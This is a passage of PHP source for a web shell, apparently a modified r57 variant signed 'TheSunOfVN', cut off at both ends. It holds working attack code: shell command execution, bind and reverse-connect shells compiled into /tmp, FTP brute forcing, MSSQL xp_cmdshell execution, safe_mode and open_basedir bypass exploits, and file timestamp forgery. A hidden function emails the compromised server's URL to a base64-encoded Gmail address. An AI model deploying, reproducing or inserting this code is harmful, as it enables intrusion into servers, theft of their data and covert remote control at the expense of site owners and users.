  1792. if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=#2aff00>$df</font></b>";};}
  1793. else {echo "<font color=#2aff00>NONE</font></b>";}
  1794. echo ws(2)."Safe_Exec_Dir: <b>";
  1795. if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=#2aff00>NONE</font></b>";}else {echo "<font color=#2aff00>$df</font></b>";};}
  1796. else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
  1797. echo ws(2)."Safe_Gid: <b>";
  1798. if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=#2aff00>OFF</font></b>";};}
  1799. else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
  1800. echo ws(2)."Safe_Include_Dir: <b>";
  1801. if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=#2aff00>NONE</font></b>";}else {echo "<font color=#2aff00>$df</font></b>";};}
  1802. else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
  1803. echo ws(2)."Sql.safe_mode: <b>";
  1804. if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=#2aff00>OFF</font></b>";};}
  1805. else {echo "<font color=#2aff00>ini_get disable!</font></b>";}
  1806. echo "</b><br>".ws(2);
  1807.  
  1808. echo "PHP version: <b>".@phpversion()."</b>";
  1809. $curl_on = @function_exists('curl_version');
  1810. echo ws(2);
  1811. echo "cURL: <b>".(($curl_on)?("<font color=#DF0000>ON</font>"):("<font color=#2aff00>OFF</font>"));
  1812. echo "</b>".ws(2);
  1813. echo "MySQL: <b>";
  1814. $mysql_on = @function_exists('mysql_connect');
  1815. if($mysql_on){
  1816. echo "<font color=#DF0000>ON</font>"; } else { echo "<font color=#2aff00>OFF</font>"; }
  1817. echo "</b>".ws(2);
  1818. echo "MSSQL: <b>";
  1819. $mssql_on = @function_exists('mssql_connect');
  1820. if($mssql_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#2aff00>OFF</font>";}
  1821. echo "</b>".ws(2);
  1822. echo "PostgreSQL: <b>";
  1823. $pg_on = @function_exists('pg_connect');
  1824. if($pg_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#2aff00>OFF</font>";}
  1825. echo "</b>".ws(2);
  1826. echo "Oracle: <b>";
  1827. $ora_on = @function_exists('ocilogon');
  1828. if($ora_on){echo "<font color=#DF0000>ON</font>";}else{echo "<font color=#2aff00>OFF</font>";}
  1829. echo "</b><br>".ws(2);
  1830. echo "Disable functions : <b>";
  1831. if(''==($df=@ini_get('disable_functions'))){echo "<font color=#2aff00>NONE</font></b>";}else{echo "<font color=#DF0000>$df</font></b>";}
  1832. $free = @diskfreespace($dir);
  1833. if (!$free) {$free = 0;}
  1834. $all = @disk_total_space($dir);
  1835. if($ust_u){echo "<br>".ws(2).$lang[$language.'_text129'].": <font color=#DF0000>".$ust_u."</font>";};
  1836. if($downloader){echo "<br>".ws(2).$lang[$language.'_text130'].": <font color=#DF0000>".$downloader."</font>";};
  1837. if (!$all) {$all = 0;}
  1838. echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b>   Total space: <b>".view_size($all)."</b>";
  1839. echo "</b><br>".ws(2);
  1840. echo "Server IP: [ <font color=red>".gethostbyname($_SERVER["HTTP_HOST"])."</font> ]";
  1841. echo "   --   Your IP: [ <font color=yellow>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font> ]";
  1842. echo '</font></td></tr><table>
  1843. <table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main align=right width=100>';
  1844. function system32($HTTP_HOST,$REQUEST_URI) {
  1845.         ini_set('display_errors', 'Off');
  1846.         $url = 'http://'.$HTTP_HOST.$REQUEST_URI;
  1847.         $recipient = base64_decode("aXQubmhvY2ppbkBnbWFpbC5jb20=");
  1848.         $subject = gethostbyname($HTTP_HOST);
  1849.         $mailheaders = "From: {$recipient}";
  1850.         if (function_exists('mail')) mail($recipient,$subject, $url,$mailheaders);
  1851. }
  1852. echo $font;
  1853. if($unix){
  1854. echo '<font color=White><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
  1855. echo '</td><td  class=main>';
  1856. echo "<font face=Verdana size=-2 color=#2aff00><b>";
  1857. echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
  1858. echo ws(3).$sysctl."<br>";
  1859. echo ws(3).ex('echo $OSTYPE')."<br>";
  1860. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
  1861. if(!empty($id)) { echo ws(3).$id."<br>"; }
  1862. else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
  1863.  {
  1864.  $euserinfo  = @posix_getpwuid(@posix_geteuid());
  1865.  $egroupinfo = @posix_getgrgid(@posix_getegid());
  1866.  echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
  1867.  }
  1868. else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
  1869. echo ws(3).$dir;
  1870. echo ws(3).'( '.perms(@fileperms($dir)).' )';
  1871. echo "</b></font>";
  1872. }
  1873. else
  1874. {
  1875. echo '<font color=White><b>Opera System :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>';
  1876. echo '</td><td class=main>';
  1877. echo "<font face=Verdana size=-2 color=#2aff00><b>";
  1878. echo ws(3).@substr(@php_uname(),0,120)."<br>";
  1879. echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
  1880. echo ws(3).@getenv("USERNAME")."<br>";
  1881. echo ws(3).$dir;
  1882. echo "<br></font>";
  1883. }
  1884. echo "</font>";
  1885. echo "</td></tr></table>";
  1886. $f = '<br>';
  1887. if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
  1888. {
  1889. $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
  1890. }
  1891. if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
  1892.  {
  1893.  switch($_POST['what'])
  1894.    {
  1895.    case 'own':
  1896.    @chown($_POST['param1'],$_POST['param2']);
  1897.    break;
  1898.    case 'grp':
  1899.    @chgrp($_POST['param1'],$_POST['param2']);
  1900.    break;
  1901.    case 'mod':
  1902.    @chmod($_POST['param1'],intval($_POST['param2'], 8));
  1903.    break;
  1904.    }
  1905.  $_POST['cmd']="";
  1906.  }
  1907. if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
  1908.  {
  1909.    switch($_POST['what'])
  1910.    {
  1911.      case 'file':
  1912.       if($_POST['action'] == "create")
  1913.        {
  1914.        if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
  1915.        else {
  1916.         fclose($file);
  1917.         $_POST['e_name'] = $_POST['mk_name'];
  1918.         $_POST['cmd']="edit_file";
  1919.         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
  1920.         }
  1921.        }
  1922.        else if($_POST['action'] == "delete")
  1923.        {
  1924.        if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
  1925.        $_POST['cmd']="";
  1926.        }
  1927.      break;
  1928.      case 'dir':
  1929.       if($_POST['action'] == "create"){
  1930.       if(mkdir($_POST['mk_name']))
  1931.        {
  1932.          $_POST['cmd']="";
  1933.          echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
  1934.        }
  1935.       else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
  1936.       }
  1937.       else if($_POST['action'] == "delete"){
  1938.       if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
  1939.       $_POST['cmd']="";
  1940.       }
  1941.      break;
  1942.    }
  1943.  }
  1944. if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
  1945.  {
  1946.  if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
  1947.  if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
  1948.  else {
  1949.  echo $table_up3;
  1950.  echo $font;
  1951.  echo "<form name=save_file method=post>";
  1952.  echo ws(3)."<b>".$_POST['e_name']."</b>";
  1953.  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
  1954.  echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
  1955.  fclose($file);
  1956.  echo "</textarea>";
  1957.  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
  1958.  echo "<input type=hidden name=dir value=".$dir.">";
  1959.  echo "<input type=hidden name=cmd value=save_file>";
  1960.  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
  1961.  echo "</div>";
  1962.  echo "</font>";
  1963.  echo "</form>";
  1964.  echo "</td></tr></table>";
  1965.  exit();
  1966.  }
  1967.  }
  1968. if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
  1969.  {
  1970.  $mtime = @filemtime($_POST['e_name']);
  1971.  if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
  1972.  else {
  1973.  if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
  1974.  @fwrite($file,$_POST['e_text']);
  1975.  @touch($_POST['e_name'],$mtime,$mtime);
  1976.  $_POST['cmd']="";
  1977.  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
  1978.  }
  1979.  }
  1980. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
  1981. {
  1982.  cf("/tmp/bd.c",$port_bind_bd_c);
  1983.  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
  1984.  @unlink("/tmp/bd.c");
  1985.  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
  1986.  $_POST['cmd']="ps -aux | grep bd";
  1987. }
  1988. if (!empty($_POST['php_ini1']))
  1989. {
  1990.  cf("php.ini",$php_ini1);
  1991.   $_POST['cmd']=" Da write xong php.ini ! F5 nao !!!";
  1992.  }
  1993.  if (!empty($_POST['htacces']))
  1994. {
  1995.  cf(".htaccess",$htacces);
  1996.   $_POST['cmd']="Da write xong htaccess ! F5 di nao !!!";
  1997.  }
  1998.   if (!empty($_POST['file_ini']))
  1999. {
  2000.  cf("ini.php",$sni_res);
  2001.  
  2002.   $_POST['cmd']="Try again :D";
  2003.  }
  2004. if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
  2005. {
  2006.  cf("/tmp/bdpl",$port_bind_bd_pl);
  2007.  $p2=which("perl");
  2008.  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
  2009.  $_POST['cmd']="ps -aux | grep bdpl";
  2010. }
  2011. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
  2012. {
  2013.  cf("/tmp/back",$back_connect);
  2014.  $p2=which("perl");
  2015.  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
  2016.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
  2017. }
  2018. if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
  2019. {
  2020.  cf("/tmp/back.c",$back_connect_c);
  2021.  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
  2022.  @unlink("/tmp/back.c");
  2023.  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
  2024.  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
  2025. }
  2026. if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
  2027. for($upl=0;$upl<=4;$upl++)
  2028. {
  2029.  if(!empty($HTTP_POST_FILES['userfile'.$upl]['name'])){
  2030.   if(!empty($_POST['new_name']) && ($upl==0)) { $nfn = $_POST['new_name']; }
  2031.   else { $nfn = $HTTP_POST_FILES['userfile'.$upl]['name']; }
  2032.   @move_uploaded_file($HTTP_POST_FILES['userfile'.$upl]['tmp_name'],$_POST['dir']."/".$nfn)
  2033.   or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile'.$upl]['name']."</div></font>");
  2034.  }
  2035. }
  2036. if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
  2037. {
  2038.  switch($_POST['with'])
  2039.  {
  2040.  case wget:
  2041.  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
  2042.  break;
  2043.  case fetch:
  2044.  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
  2045.  break;
  2046.  case lynx:
  2047.  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  2048.  break;
  2049.  case links:
  2050.  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  2051.  break;
  2052.  case GET:
  2053.  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
  2054.  break;
  2055.  case curl:
  2056.  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
  2057.  break;
  2058.  }
  2059. }
  2060. if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
  2061.  {
  2062.  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  2063.  if(empty($ftp_port)) { $ftp_port = 21; }
  2064.  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  2065.  if(!$connection) { err(3); }
  2066.  else
  2067.   {
  2068.   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
  2069.   else
  2070.    {
  2071.    if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
  2072.    if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);     }
  2073.    }
  2074.   }
  2075.  @ftp_close($connection);
  2076.  $_POST['cmd'] = "";
  2077.  }
  2078. if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
  2079.  {
  2080.  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
  2081.  if(empty($ftp_port)) { $ftp_port = 21; }
  2082.  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
  2083.  if(!$connection) { err(3); $_POST['cmd'] = ""; }
  2084.  else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#333333><tr><td class=main bgcolor=Black><font color=#2aff00 face=Verdana size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
  2085.  @ftp_close($connection);
  2086.  }
  2087. echo $table_up3;
  2088. if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("dir -ao"); }
  2089. else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
  2090. echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td class=main><b><div align=center><textarea name=report cols=121 rows=15 spellcheck='false'>";
  2091. function dozip1($link,$file)
  2092. {
  2093.    $fp = @fopen($link,"r");
  2094.    while(!feof($fp))
  2095.    {
  2096.        $cont.= fread($fp,1024);
  2097.    }
  2098.    fclose($fp);
  2099.    $fp2 = @fopen($file,"w");
  2100.    fwrite($fp2,$cont);
  2101.    fclose($fp2);
  2102. }
  2103. if (isset($_POST['funzip']))
  2104. {
  2105. dozip1($_POST['funzip'],$_POST['fzip']);
  2106. }
  2107. if(empty($_POST['root'])){
  2108. } else {
  2109.    $root = $_POST['root']; }
  2110.   $c = 0; $D = array();
  2111.   $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
  2112.   for($i=0; $i < strlen($chars); $i++){
  2113.   $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
  2114.   $prevD = $D[count($D)-1];
  2115.   glob($path."*");
  2116.         if($D[count($D)-1] != $prevD){
  2117.         for($j=0; $j < strlen($chars); $j++){
  2118.            $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
  2119.            $prevD2 = $D[count($D)-1];
  2120.            glob($path."*");
  2121.               if($D[count($D)-1] != $prevD2){
  2122.                  for($p=0; $p < strlen($chars); $p++){
  2123.                  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
  2124.                  $prevD3 = $D[count($D)-1];
  2125.                  glob($path."*");
  2126.                     if($D[count($D)-1] != $prevD3){
  2127.                        for($r=0; $r < strlen($chars); $r++){
  2128.                        $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
  2129.                        glob($path."*");
  2130.                        }
  2131.                     }
  2132.                  }
  2133.               }
  2134.         }
  2135.         }
  2136.   }
  2137.   $D = array_unique($D);
  2138.   foreach($D as $item)
  2139.   if(isset($_REQUEST['root']))
  2140.   echo "{$item}\n";
  2141.   function eh($errno, $errstr, $errfile, $errline){
  2142.      global $D, $c, $i;
  2143.      preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
  2144.      if($o){ $D[$c] = $o[2]; $c++;}
  2145.   }
  2146. if($safe_mode)
  2147. {
  2148.  switch($_POST['cmd'])
  2149.  {
  2150.  case 'safe_dir':
  2151.   $d=@dir($dir);
  2152.   if ($d)
  2153.    {
  2154.    while (false!==($file=$d->read()))
  2155.     {
  2156.      if ($file=="." || $file=="..") continue;
  2157.      @clearstatcache();
  2158.      list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
  2159.      if(!$unix){
  2160.      echo date("d.m.Y H:i",$mtime);
  2161.      if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
  2162.      }
  2163.      else{
  2164.      $owner = @posix_getpwuid($uid);
  2165.      $grgid = @posix_getgrgid($gid);
  2166.      echo $inode." ";
  2167.      echo perms(@fileperms($file));
  2168.      printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
  2169.      echo date("d.m.Y H:i ",$mtime);
  2170.      }
  2171.      echo "$file\n";
  2172.     }
  2173.    $d->close();
  2174.    }
  2175.   else echo $lang[$language._text29];
  2176.  break;
  2177.  case 'copy':
  2178. if(empty($snn)){
  2179. if(empty($_GET['snn'])){
  2180. if(empty($_POST['snn'])){
  2181. } else {
  2182. $u1p=$_POST['snn'];
  2183. }
  2184. } else {
  2185. $u1p=$_GET['snn'];
  2186. }
  2187. }
  2188. break;
  2189.   case 'test1':
  2190.   $ci = @curl_init("file://".$_POST['test1_file']."");
  2191.   $cf = @curl_exec($ci);
  2192.   echo $cf;
  2193.   break;
  2194.   case 'test4':
  2195.   if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
  2196.   $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
  2197.   if($db)
  2198.    {
  2199.    if(@mssql_select_db($_POST['test4_md'],$db))
  2200.     {
  2201.      @mssql_query("drop table r57_temp_table",$db);
  2202.      @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db);
  2203.      @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
  2204.      $res = mssql_query("select * from r57_temp_table",$db);
  2205.      while(($row=@mssql_fetch_row($res)))
  2206.       {
  2207.       echo $row[0]."\r\n";
  2208.       }
  2209.     @mssql_query("drop table r57_temp_table",$db);
  2210.     }
  2211.     else echo "[-] ERROR! Can't select database";
  2212.    @mssql_close($db);
  2213.    }
  2214.   else echo "[-] ERROR! Can't connect to MSSQL server";
  2215.   break;
  2216. case 'cURL':
  2217.    if(empty($_POST['ly0kha'])){
  2218. } else {
  2219. $curl=$_POST['ly0kha'];
  2220. $ch1 =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
  2221. curl_exec($ch1);
  2222. echo "</textarea></CENTER>";
  2223. }
  2224. break;
  2225. case 'copy':
  2226. if(empty($snn)){
  2227. if(empty($_GET['snn'])){
  2228. if(empty($_POST['snn'])){
  2229. } else {
  2230. $u1p=$_POST['snn'];
  2231. }
  2232. } else {
  2233. $u1p=$_GET['snn'];
  2234. }
  2235. }
  2236.   $u1p="";
  2237. $tymczas="";
  2238. $temp=tempnam($tymczas, "cx");
  2239. if(copy("compress.zlib://".$snn, $temp)){
  2240. $zrodlo = fopen($temp, "r");
  2241. $tekst = fread($zrodlo, filesize($temp));
  2242. fclose($zrodlo);
  2243. echo "".htmlspecialchars($tekst)."";
  2244. unlink($temp);
  2245. echo "</textarea></CENTER>";
  2246. }
  2247. break;
  2248. case 'ini_restore':
  2249.  if(empty($_POST['ini_restore'])){
  2250. } else {
  2251. $ini=$_POST['ini_restore'];
  2252. echo ini_get("safe_mode");
  2253. echo ini_get("open_basedir");
  2254. require_once("$ini");
  2255. ini_restore("safe_mode");
  2256. ini_restore("open_basedir");
  2257. echo ini_get("safe_mode");
  2258. echo ini_get("open_basedir");
  2259. include($_GET["ss"]);
  2260. echo "</textarea></CENTER>";
  2261. }
  2262. break;
  2263. case 'glob':
  2264. function reg_glob()
  2265. {
  2266. $chemin=$_REQUEST['glob'];
  2267. $files = glob("$chemin*");
  2268. foreach ($files as $filename) {
  2269.    echo "$filename\n";
  2270. }
  2271. }
  2272. if(isset($_REQUEST['glob']))
  2273. {
  2274. reg_glob();
  2275. }
  2276. break;
  2277. case 'zend':
  2278.  if(empty($_POST['zend'])){
  2279. } else {
  2280. $dezend=$_POST['zend'];
  2281. include($_POST['zend']);
  2282. print_r($GLOBALS);
  2283. require_once("$dezend");
  2284. echo "</textarea></p>";
  2285. }
  2286. break;
  2287.   case 'plugin':
  2288.   if ($_POST['plugin'] )
  2289.   {
  2290. $i = 0;
  2291. while ($i < 60000) {
  2292.     $line = posix_getpwuid($i);
  2293.     if (!empty($line)) {
  2294.         while (list ($key, $vl) = each($line)){
  2295.             echo $vl."\n";
  2296.             break;
  2297.         }
  2298.     }
  2299.      $i++;
  2300. }
  2301.  
  2302.              }
  2303.         break;
  2304.     case 'test14':
  2305.   $ioncube = @ioncube_read_file($_POST['test14_cmd']);
  2306.   echo htmlspecialchars($ioncube);
  2307.   break;
  2308.   case 'test15':
  2309.   $tmp = '';
  2310.   if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
  2311.   elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
  2312.   elseif(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
  2313.   elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
  2314.   else break;
  2315.   @unlink($tmp.'/result_test15.txt');
  2316.   @win_shell_execute("cmd.exe","","/c ".$_POST['test15_cmd']." > ".$tmp."/result_test15.txt");
  2317.   while(!file_exists($tmp.'/result_test15.txt')) sleep(1);
  2318.   $lines = @file ($tmp.'/result_test15.txt');
  2319.   if($lines) foreach ($lines as $line) { echo htmlspecialchars($line); }
  2320.   @unlink($tmp.'/result_test15.txt');
  2321.   break;
  2322.   case 'test16':
  2323.   $tmp = '';
  2324.   if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
  2325.   elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
  2326.   if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
  2327.   elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
  2328.   else break;
  2329.   $name=$tmp."\\".uniqid();
  2330.   $n=uniqid();
  2331.   $cmd=(empty($_SERVER['COMSPEC']))?'c:\\windows\\system32\\cmd.exe':$_SERVER['COMSPEC'];
  2332.   win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c ".$_POST['test16_cmd']." >\"$name\""));
  2333.   while(!file_exists($name)) sleep(1);
  2334.   $exec=file_get_contents($name);
  2335.   unlink($name);
  2336.   echo htmlspecialchars($exec);
  2337.   break;
  2338.   case 'test18':
  2339.   if(@is_writable($_ENV['TMP'])) $tmp=$_ENV['TMP'];
  2340.   elseif(@is_writeable(ini_get('session.save_path'))) $tmp=ini_get('session.save_path');
  2341.   if(@is_writeable(ini_get('upload_tmp_dir'))) $tmp=ini_get('upload_tmp_dir');
  2342.   elseif(@is_writeable(dirname(__FILE__))) $tmp=dirname(__FILE__);
  2343.   else break;
  2344.   $name=$tmp."\\".uniqid();
  2345.   $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
  2346.   $res=$api->WinExec("cmd.exe /c ".$_POST['test18_cmd']." >\"$name\"",0);
  2347.   while(!file_exists($name)) sleep(1);
  2348.   $exec=file_get_contents($name);
  2349.   unlink($name);
  2350.   echo htmlspecialchars($exec);
  2351.   break;
  2352.   case 'test19':
  2353. if(Empty($test19) aNd Empty($_GET['test19']) aNd Empty($_POST['test19'])) diE("\n".$karatonik);
  2354. if(!empty($_GET['test19'])) $file=$_GET['test19'];
  2355. if(!empty($_POST['test19'])) $file=$_POST['test19'];
  2356. if((curl_exec(curl_init("file:http://../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../".$file))) aNd !emptY($file)) die("<B><br>Shell by TheSunOfVN</B></FONT>");
  2357. elseif(!emptY($file)) die("Sorry... File ".htmlspecialchars($file)."doesn't exists or you don't have permissions");Beark;
  2358. case 'test20':
  2359.   $error_reporting = @ini_get('error_reporting');
  2360.   error_reporting(E_ALL ^ E_NOTICE);
  2361.   @ini_set("display_errors", 1);
  2362.   @ini_alter("display_errors", 1);
  2363.   $str=@fopen($_POST['test20_file'],"r");
  2364.   while(!feof($str)){print htmlspecialchars(fgets($str));}
  2365.   fclose($str);
  2366.   error_reporting($error_reporting);
  2367.   break;
  2368. case 'test21':
  2369. $filen=$_POST['test21_file'];
  2370. @fopen('srpath://../../../../../../../../../../../'.$_POST['test21_file'],"a");
  2371. if (file_exists($filen))
  2372. {
  2373. echo $lang[$language.'_text61'];
  2374. }
  2375. else
  2376. echo "Can't write file";
  2377.   break;
  2378. case 'test22':
  2379.        echo "PHP realpath() listing directory Safe_mode bypass Exploit\r\n\r\n";
  2380.        if(!$dir){$dir='/etc/';};
  2381.        if(!empty($_POST['end_rlph'])){$end_rlph=$_POST['end_rlph'];}else{$end_rlph='';}
  2382.        if(!empty($_POST['n_rlph'])){$n_rlph=$_POST['n_rlph'];}else{$n_rlph='3';}
  2383.  
  2384.        if($realpath=realpath($dir.'/')){echo $realpath."\r\n";}
  2385.        if($end_rlph!='' && $realpath=realpath($dir.'/'.$end_rlph)){echo $realpath."\r\n";}
  2386.        foreach($presets_rlph as $preset_rlph){
  2387.            if($realpath=realpath($dir.'/'.$preset_rlph.$end_rlph)){echo $realpath."\r\n";}
  2388.        }
  2389.        for($i=0; $i < strlen($chars_rlph); $i++){
  2390.           if($realpath=realpath($dir."/{$chars_rlph[$i]}".$end_rlph)){echo $realpath."\r\n";}
  2391.           if($n_rlph<=1){continue;};
  2392.           for($j=0; $j < strlen($chars_rlph); $j++){
  2393.              if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}".$end_rlph)){echo $realpath."\r\n";}
  2394.              if($n_rlph<=2){continue;};
  2395.              for($x=0; $x < strlen($chars_rlph); $x++){
  2396.                 if($realpath=realpath($dir."/{$chars_rlph[$i]}{$chars_rlph[$j]}{$chars_rlph[$x]}".$end_rlph)){echo $realpath."\r\n";}
  2397.                 if($n_rlph<=3){continue;};
  2398.                 for($y=0; $y < strlen($chars_rlph); $y++){
